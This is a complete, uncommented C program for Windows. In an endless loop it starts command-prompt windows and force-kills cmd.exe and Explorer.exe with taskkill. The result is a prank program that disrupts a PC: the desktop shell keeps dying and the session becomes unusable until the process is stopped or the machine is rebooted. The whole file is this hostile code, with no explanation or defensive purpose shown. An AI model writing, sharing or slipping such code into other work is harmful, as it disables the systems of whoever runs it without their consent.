#include<stdio.h>
#include<stdlib.h>
int main(){
 	while(1)
        {
 		system("start cmd.exe"); 
		system("taskkill/f/im cmd.exe"); 
		system("taskkill/f/im Explorer.exe");
 	} 
	return 0; 
}